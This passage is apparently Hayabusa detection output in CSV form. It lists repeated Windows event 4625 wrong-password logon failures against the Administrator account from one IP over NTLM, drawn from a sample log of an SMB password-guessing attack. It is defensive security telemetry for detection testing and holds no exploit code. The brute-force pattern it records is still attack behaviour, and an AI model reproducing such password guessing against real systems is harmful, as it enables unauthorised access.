NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jk6PsiAiLPsHGUh1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KeGDMp9My5eLJz55 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BvDQphjvwOCsNQqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJhad4aocvPMYVP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJl3XqTUxvqiKKaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1fAJDfguuoNxWiR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: daAeGcsqoqERsEu6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0iynnwxS8v4C5b3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2kU7IS4XCvgRpTff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MBC8AJXBQHrCMrO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NSGraDQmI4MAq9Ls : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7u2Pb9y8hB0iYWh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A657rbd6k4AD7M4i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7rkiDUBuTCU2jDXR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jjsCFTQoobrkQoWF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2dNXav95nZyBhVOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yeq1x56Ct6R2Nu3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pUwyCNtwydEQu2bd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bX7eihAOk3PUgbwM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WPXqAsaYaXEr8I9L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4SaEmIpmlH1VMDun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3Dvp43a2h7Mzx2H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g3voKlRXc7rIaIYs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GF1Q5OhCLRAi96mN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: caHe4iY2CQoiumQI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SJi6UAm6Pp6eax8Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EW0t2wapD8yniO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PnaITXTihpB0stwx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tdBVoa82WKEAW2ce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BelKzJrEjGIcU2dN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ujeb7fRHPGCGmFm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Czwt7KF2sQHemwdJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LQQ4nNpbfKKVCJZH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6jwIc6e0AHAhXKK5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nld9Job0Ll1Fgtmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9sS6i9iU3PXhokz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: heaYv6Np8swhoVc9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7rzgNBtUJkS93pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh45suNQ09FzPBjd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BOnwAGxxz994k6Ee : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L26mvUKOgGptcKaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aqldRjcLl8KFZr5h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ycNPBtmRHShPOcRA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ISlMGsVvXry0rbju : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MjGjh70EQ5YVGJUt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yaYM5N2kuvuRCHRU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 32wgj2t7BLBviVxd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vr1kMRxLEaCIWIbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4PHEJyKgp5wXRtBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbaoz8rTZVXUjRAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d4eD3JQ5gquIqgND : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9slFFSSXhFxPqG1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDb5Up4KwJj0hN5n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxqIpDLlnf6Xyc34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTCTTYmKTIzzJwxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oD3dLxlB3qWIhZEQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fe9xMOoCxPJIIyVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DW3YgBZYiGTeEw66 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VAKeeIcOeiQ3H9NF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nmF3ot3gJCsBlSwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDjoResfZvvVqqE5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V4dwzMwvVtzztGwr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qklApBFOMxVzucD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0IJSphtLB3eNARBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLOFe4w5KpJ2UaGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3JTWkGadY1fJE2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyTH0jxSZB2YVdhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NRq5XrcDkFvabCzh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlYwlgrsMy1kSgEC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AchwW4ifbZ41AQNg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PaxF7Q8ue1Kex1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WAhW2PErXdwNVrx5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoAV3ESqieev2JMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFlWFijaFirgsAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSDjuqvzKLaWCWVo : IP Address: 192.168.198.149 : AuthPackage: 